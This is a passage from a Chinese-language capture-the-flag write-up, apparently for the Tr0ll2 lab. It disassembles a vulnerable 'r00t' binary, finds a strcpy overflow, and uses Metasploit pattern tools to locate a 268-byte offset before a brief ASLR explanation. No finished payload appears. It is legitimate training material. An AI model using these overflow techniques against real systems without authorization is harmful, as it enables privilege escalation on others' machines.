%esp,%ebp\n# 0x08048447 <+3>: and $0xfffffff0,%esp\n# 0x0804844a <+6>: sub $0x110,%esp\n# 0x08048450 <+12>: cmpl $0x1,0x8(%ebp)\n# 0x08048454 <+16>: jne 0x8048478 <main+52>\n# 0x08048456 <+18>: mov 0xc(%ebp),%eax\n# 0x08048459 <+21>: mov (%eax),%edx\n# 0x0804845b <+23>: mov $0x8048580,%eax\n# 0x08048460 <+28>: mov %edx,0x4(%esp)\n# 0x08048464 <+32>: mov %eax,(%esp)\n# 0x08048467 <+35>: call 0x8048340 <printf@plt>\n# 0x0804846c <+40>: movl $0x0,(%esp)\n# 0x08048473 <+47>: call 0x8048370 <exit@plt>\n# 0x08048478 <+52>: mov 0xc(%ebp),%eax\n# 0x0804847b <+55>: add $0x4,%eax\n# 0x0804847e <+58>: mov (%eax),%eax\n# 0x08048480 <+60>: mov %eax,0x4(%esp)\n# 0x08048484 <+64>: lea 0x10(%esp),%eax\n# 0x08048488 <+68>: mov %eax,(%esp)\n# 0x0804848b <+71>: call 0x8048350 <strcpy@plt>\n# 0x08048490 <+76>: mov $0x8048591,%eax\n# 0x08048495 <+81>: lea 0x10(%esp),%edx\n# 0x08048499 <+85>: mov %edx,0x4(%esp)\n# 0x0804849d <+89>: mov %eax,(%esp)\n# 0x080484a0 <+92>: call 0x8048340 <printf@plt>\n# 0x080484a5 <+97>: leave \n# 0x080484a6 <+98>: ret \n# End of assembler dump.<\/code><\/pre>\n\u53d1\u73b0\u4e86\u4e00\u4e2astrcpy<\/code>\u51fd\u6570\uff0c\u4e0d\u77e5\u9053\u9614\u6b65\u9614\u4ee5\u8fdb\u884c\u5229\u7528\u3002<\/p>\n\u5148\u6253\u4e00\u4e2a\u957f\u70b9\u7684\u5b57\u7b26\u4e32\u770b\u770b\u6709\u6ca1\u6709\u53cd\u5e94\uff1a<\/p>\n
.\/r00t $(python -c 'print "A" * 1000')<\/code><\/pre>\n<\/div><\/p>\n\u795e\u5947\uff0c\u5ffd\u9690\u5ffd\u73b0\u7684\uff0c\u53c8\u51fa\u73b0\u4e86\uff0c\u4f46\u662f\u597d\u50cf\u6ca1\u6709\u6ea2\u51fa\u6b38\uff0c\u6211\u64e6\u641e\u9519\u4e86\uff0c\u91cd\u6765:<\/p>\n
<\/div><\/p>\n\u4e00\u8fd0\u884c\u5c31\u4f1a\u6539\u6743\u9650\u6216\u8005\u8e22\u51fa\u53bb\uff1f\u884c\uff08xieng\uff09\u6bcf\u6b21\u91cd\u65b0\u542f\u52a8\u65f6\u90fd\u4f1a\u66f4\u6539\u5f7c\u6b64\u7684\u884c\u4e3a\u662f\u5427\uff01<\/p>\n
\n\u6ce8\u610f\uff1a<\/strong> r00t \u7a0b\u5e8f\u7ecf\u5e38\u66f4\u6539\u5176\u95e8\u76ee\u5f55\uff0c\u9700\u8981\u8bb0\u4f4f\u3002\u8fd8\u6709\u4e00\u4e2a\u201cHARD MODE\u201d\uff0c\u53ef\u4ee5\u963b\u6b62\u5728 2 \u5206\u949f\u5185\u4f7f\u7528\u201cls\u201d\u3002\u53e6\u5916\uff0c\u8bb0\u4f4f\u662f\u5426\u770b\u5230\u6d88\u606f\u201cGood job, stand by, executing root shell\u2026.\u201d\u3002\u8fd9\u662f\u4e00\u4e2a\u9677\u9631\uff0c\u8fde\u63a5\u5c06\u88ab\u5173\u95ed\uff0c\u9700\u8981\u7acb\u5373\u4f7f\u7528\u201cCtrl + c\u201d\u7ec8\u6b62\u7a0b\u5e8f\u5e76\u5c06\u76ee\u5f55\u66f4\u6539\u4e3a\u4efb\u4f55\u5176\u4ed6door\u3002<\/p>\n<\/blockquote>\n<\/div><\/p>\n\u8c22\u7279\uff01<\/p>\n
\u518d\u6765\uff1a<\/p>\n
<\/div><\/p>\n\u770b\u6765\u786e\u5b9e\u662f\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u7684\u6f0f\u6d1e\u7684\u3002<\/p>\n
\u8fd9\u6837\u7684\u8bdd\u521a\u521a\u5206\u6790\u9519\u4e86\uff1f\u770b\u4e00\u4e0b\u8fd9\u4e2a\u7684\u6c47\u7f16\u4ee3\u7801\uff1a<\/p>\n
noob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door3$ gdb -q r00t\n# Reading symbols from \/nothing_to_see_here\/choose_wisely\/door3\/r00t...done.\n(gdb) disassemble main\n# Dump of assembler code for function main:\n# 0x08048444 <+0>: push %ebp\n# 0x08048445 <+1>: mov %esp,%ebp\n# 0x08048447 <+3>: and $0xfffffff0,%esp\n# 0x0804844a <+6>: sub $0x110,%esp\n# 0x08048450 <+12>: cmpl $0x1,0x8(%ebp)\n# 0x08048454 <+16>: jne 0x8048478 <main+52>\n# 0x08048456 <+18>: mov 0xc(%ebp),%eax\n# 0x08048459 <+21>: mov (%eax),%edx\n# 0x0804845b <+23>: mov $0x8048580,%eax\n# 0x08048460 <+28>: mov %edx,0x4(%esp)\n# 0x08048464 <+32>: mov %eax,(%esp)\n# 0x08048467 <+35>: call 0x8048340 <printf@plt>\n# 0x0804846c <+40>: movl $0x0,(%esp)\n# 0x08048473 <+47>: call 0x8048370 <exit@plt>\n# 0x08048478 <+52>: mov 0xc(%ebp),%eax\n# 0x0804847b <+55>: add $0x4,%eax\n# 0x0804847e <+58>: mov (%eax),%eax\n# 0x08048480 <+60>: mov %eax,0x4(%esp)\n# 0x08048484 <+64>: lea 0x10(%esp),%eax\n# 0x08048488 <+68>: mov %eax,(%esp)\n# 0x0804848b <+71>: call 0x8048350 <strcpy@plt>\n# 0x08048490 <+76>: mov $0x8048591,%eax\n# 0x08048495 <+81>: lea 0x10(%esp),%edx\n# 0x08048499 <+85>: mov %edx,0x4(%esp)\n# 0x0804849d <+89>: mov %eax,(%esp)\n# 0x080484a0 <+92>: call 0x8048340 <printf@plt>\n# 0x080484a5 <+97>: leave \n# 0x080484a6 <+98>: ret \n# End of assembler dump.<\/code><\/pre>\nok\uff0c\u8fd8\u662f\u6709\u7684\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4e86\u5229\u7528\uff01\uff01\uff01<\/p>\n
\u67e5\u770b\u504f\u79fb\u91cf<\/h4>\n
\u5148\u786e\u5b9a\u4e00\u4e0b\u504f\u79fb\u91cf\uff0c\u4f7f\u7528metasploit<\/code>\u7684\u5de5\u5177\u786e\u5b9a\u4e00\u4e0b\uff1a<\/p>\n# kali\nlocate pattern_create.rb\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 1000\n#Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B<\/code><\/pre>\n# Tr0ll\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door3$ gdb -q r00t\n# gdb: warning: error finding working directory: No such file or directory\n# r00t: No such file or directory.\n(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B\n# Starting program: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B\n# No executable file specified.\n# Use the "file" or "exec-file" command.\n(gdb) ^Z\n# [2]+ Stopped gdb -q r00t\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door3$ .\/r00t\n# -bash: .\/r00t: No such file or directory\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door3$ cd ..\/\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely$ cd door2\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door2$ .\/r00t\n# Good job, stand by, executing root shell...\n# ^C\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door2$ cd ..\/\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely$ cd door1\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ .\/r00t\n# Usage: .\/r00t input\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ gdb -q r00t\n# Reading symbols from \/nothing_to_see_here\/choose_wisely\/door1\/r00t...done.\n(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B\n# Starting program: \/nothing_to_see_here\/choose_wisely\/door1\/r00t Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B\n\n# Program received signal SIGSEGV, Segmentation fault.\n# 0x6a413969 in ?? ()<\/code><\/pre>\n\u786e\u5b9a\u4e00\u4e0b\u504f\u79fb\u91cf\uff1a<\/p>\n
# kali\nlocate pattern_offset\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb -q 6a413969\n# [*] Exact match at offset 268<\/code><\/pre>\nok\uff0c\u8ba9\u6211\u4eec\u770b\u4e00\u4e0bALSR<\/code>\u5f00\u6ca1\u5f00\uff08\u6c42\u6c42\u4e86\uff01\uff01\uff01\uff09<\/p>\n\nASLR\uff08Address Space Layout Randomization\uff09\u662f\u4e00\u79cd\u8ba1\u7b97\u673a\u5b89\u5168\u6280\u672f\uff0c\u65e8\u5728\u589e\u52a0\u7cfb\u7edf\u7684\u5b89\u5168\u6027\uff0c\u7279\u522b\u662f\u5728\u9762\u5bf9\u7f13\u51b2\u533a\u6ea2\u51fa\u7b49\u653b\u51fb\u65f6\u3002\u5b83\u901a\u8fc7\u5728\u6bcf\u6b21\u7cfb\u7edf\u542f\u52a8\u65f6\u968f\u673a\u5316\u53ef\u6267\u884c\u6587\u4ef6\u7684\u5185\u5b58\u5e03\u5c40\uff0c\u4ee5\u53ca\u52a8\u6001\u94fe\u63a5\u5e93\u3001\u5806\u3001\u6808\u548c\u5185\u5b58\u6620\u5c04\u7b49\u533a\u57df\u7684\u5730\u5740\uff0c\u4ece\u800c\u589e\u52a0\u653b\u51fb\u8005\u5728\u5229\u7528\u7cfb\u7edf\u6f0f\u6d1e\u65f6\u7684\u96be\u5ea6\u3002<\/p>\n
\u5177\u4f53\u6765\u8bf4\uff0cASLR\u7684\u5b9e\u73b0\u4f1a\u5c06\u53ef\u6267\u884c\u6587\u4ef6\u3001\u5171\u4eab\u5e93\u3001\u5806\u3001\u6808\u7b49\u5728\u5185\u5b58\u4e2d\u7684\u5e03\u5c40\u968f\u673a\u5316\uff0c\u4f7f\u5f97\u653b\u51fb\u8005\u96be\u4ee5\u51c6\u786e\u9884\u6d4b\u5185\u5b58\u5730\u5740\uff0c\u4ece\u800c\u96be\u4ee5\u6210\u529f\u5229\u7528\u6f0f\u6d1e\u3002\u8fd9\u610f\u5473\u7740\u5373\u4f7f\u653b\u51fb\u8005\u53d1\u73b0\u4e86\u6f0f\u6d1e\uff0c\u4e5f\u5f88\u96be\u7f16\u5199\u6709\u6548\u7684\u653b\u51fb\u4ee3\u7801\uff0c\u56e0\u4e3a\u5b83\u65e0\u6cd5\u51c6\u786e\u5730\u77e5\u9053\u8981\u653b\u51fb\u7684\u5185\u5b58\u5730\u5740\u3002<\/p>\n
![\"image-20240315165352712\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115618.png\")
<\/div><\/p>\n![\"image-20240315171346126\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115619.png\")
<\/div>![\"image-20240315171358831\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115620.png\")
<\/div><\/p>\n![\"image-20240315173714609\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115621.png\")
<\/div><\/p>\n![\"image-20240315175337935\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115622.png\")
<\/div><\/p>\n![\"image-20240315175421749\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115623.png\")
<\/div><\/p>\n![\"image-20240315190005138\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115624.png\")
<\/div><\/p>\n![\"image-20240315190801463\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115625.png\")
<\/div><\/p>\n![\"image-20240315191638654\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115626.png\")
<\/div><\/p>\n![\"image-20240315194133441\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115627.png\")
<\/div><\/p>\n![\"image-20240315194648415\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115628.png\")
<\/div><\/p>\n![\"image-20240315195246779\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115629.png\")
<\/div><\/p>\n![\"image-20240315195354319\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115630.png\")
<\/div><\/p>\n![\"image-20240315202319489\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115631.png\")
<\/div><\/p>\n![\"image-20240315210329581\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115632.png\")
<\/div><\/p>\n![\"image-20240315211451512\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403152115633.png\")
<\/div><\/p>\n